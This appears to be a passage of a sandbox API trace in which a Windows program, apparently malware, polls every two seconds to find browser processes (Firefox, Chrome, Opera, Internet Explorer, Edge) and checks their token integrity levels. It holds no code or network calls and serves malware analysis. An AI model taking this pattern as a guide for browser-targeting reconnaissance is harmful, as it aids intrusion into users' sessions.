1 [0600.723] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0600.723] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0600.723] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0600.723] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0600.723] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0600.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0600.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0600.723] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0600.723] GetLastError () returned 0x7a [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0600.723] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0600.723] CloseHandle (hObject=0x668) returned 1 [0600.723] CloseHandle (hObject=0x298) returned 1 [0600.723] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0600.724] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0600.724] GetLastError () returned 0x7a [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0600.724] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0600.724] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0600.724] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0600.724] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0600.724] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0600.724] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0600.724] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0600.724] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0600.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0600.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0600.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0600.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0600.724] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0600.724] GetLastError () returned 0x7a [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0600.724] CloseHandle (hObject=0x668) returned 1 [0600.724] CloseHandle (hObject=0x298) returned 1 [0600.724] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0600.724] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0600.724] GetLastError () returned 0x7a [0600.724] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0600.724] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0600.724] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0600.724] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0600.724] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0600.724] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0600.724] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0600.724] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0600.724] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0600.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0600.724] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0600.725] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0602.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9938) returned 0xc0000004 [0602.729] VirtualAlloc (lpAddress=0x0, dwSize=0xa938, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0602.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa938, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0602.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0602.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0602.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0602.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0602.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0602.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0602.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0602.733] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0602.733] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0602.733] GetLastError () returned 0x7a [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0602.734] CloseHandle (hObject=0x668) returned 1 [0602.734] CloseHandle (hObject=0x298) returned 1 [0602.734] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0602.734] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0602.734] GetLastError () returned 0x7a [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0602.734] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0602.734] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0602.734] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0602.734] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0602.734] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0602.734] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0602.734] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0602.734] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0602.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0602.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0602.734] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0602.734] GetLastError () returned 0x7a [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0602.734] CloseHandle (hObject=0x668) returned 1 [0602.734] CloseHandle (hObject=0x298) returned 1 [0602.734] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0602.734] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0602.734] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0602.734] GetLastError () returned 0x7a [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0602.735] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0602.735] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0602.735] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0602.735] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0602.735] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0602.735] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0602.735] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0602.735] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0602.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0602.735] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0602.735] GetLastError () returned 0x7a [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0602.735] CloseHandle (hObject=0x668) returned 1 [0602.735] CloseHandle (hObject=0x298) returned 1 [0602.735] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0602.735] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0602.735] GetLastError () returned 0x7a [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0602.735] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0602.735] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0602.735] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0602.735] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0602.735] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0602.735] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0602.735] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0602.735] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0602.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0602.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0602.735] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0602.735] GetLastError () returned 0x7a [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0602.735] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0602.735] CloseHandle (hObject=0x668) returned 1 [0602.736] CloseHandle (hObject=0x298) returned 1 [0602.736] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0602.736] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0602.736] GetLastError () returned 0x7a [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0602.736] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0602.736] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0602.736] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0602.736] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0602.736] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0602.736] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0602.736] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0602.736] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0602.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0602.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0602.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0602.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0602.736] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0602.736] GetLastError () returned 0x7a [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0602.736] CloseHandle (hObject=0x668) returned 1 [0602.736] CloseHandle (hObject=0x298) returned 1 [0602.736] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0602.736] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0602.736] GetLastError () returned 0x7a [0602.736] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0602.736] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0602.736] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0602.736] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0602.736] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0602.736] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0602.736] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0602.736] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0602.736] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0602.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0602.737] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0602.737] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0604.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9938) returned 0xc0000004 [0604.742] VirtualAlloc (lpAddress=0x0, dwSize=0xa938, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0604.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa938, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0604.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0604.745] OpenProcess (dwDesiredAccess=0x400, 